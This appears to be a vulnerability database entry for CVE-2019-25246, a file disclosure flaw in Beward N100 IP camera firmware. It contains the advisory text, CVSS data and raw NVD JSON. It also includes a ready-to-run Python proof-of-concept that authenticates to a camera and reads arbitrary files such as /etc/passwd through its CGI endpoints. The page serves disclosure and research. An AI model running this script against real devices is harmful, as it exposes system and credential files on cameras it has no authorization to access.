Security Vulnerability Report
中文
CVE-2019-25246 CVSS 8.8 HIGH

CVE-2019-25246

Published: 2025-12-24 20:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Beward N100 H.264 VGA IP Camera M2.1.6 contains an authenticated file disclosure vulnerability that allows attackers to read arbitrary system files via the 'READ.filePath' parameter. Attackers can exploit the fileread script or SendCGICMD API to access sensitive files like /etc/passwd and /etc/issue by supplying absolute file paths.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Beward N100 H.264 VGA IP Camera 固件版本 M2.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2019-25246 PoC - Beward N100 IP Camera Authenticated File Read Usage: python3 poc.py <target_ip> <username> <password> <file_path> Example: python3 poc.py 192.168.1.100 admin admin /etc/passwd """ import requests import sys import base64 def exploit_cve_2019_25246(target_ip, username, password, file_path): """ Exploit for authenticated arbitrary file read vulnerability via SendCGICMD API or fileread script """ base_url = f"http://{target_ip}" # Authentication login_url = f"{base_url}/cgi-bin/login.cgi" login_data = { "username": username, "password": password } print(f"[*] Authenticating to {target_ip}...") session = requests.Session() response = session.post(login_url, data=login_data) if response.status_code != 200: print("[-] Authentication failed") return None print("[+] Authentication successful") # Method 1: Using SendCGICMD API cgi_url = f"{base_url}/cgi-bin/sendcgicmd.cgi" exploit_data = { "READ.filePath": file_path } print(f"[*] Attempting to read file: {file_path}") response = session.post(cgi_url, data=exploit_data) if response.status_code == 200 and response.text: print("[+] File content retrieved:") print(response.text) return response.text # Method 2: Alternative using fileread script fileread_url = f"{base_url}/cgi-bin/fileread" params = { "filePath": file_path } response = session.get(fileread_url, params=params) if response.status_code == 200 and response.text: print("[+] File content retrieved via fileread:") print(response.text) return response.text print("[-] Failed to retrieve file content") return None if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: {sys.argv[0]} <target_ip> <username> <password> <file_path>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] filepath = sys.argv[4] exploit_cve_2019_25246(target, user, pwd, filepath)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25246", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:52.780", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Beward N100 H.264 VGA IP Camera M2.1.6 contains an authenticated file disclosure vulnerability that allows attackers to read arbitrary system files via the 'READ.filePath' parameter. Attackers can exploit the fileread script or SendCGICMD API to access sensitive files like /etc/passwd and /etc/issue by supplying absolute file paths."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://www.beward.net", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46320", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.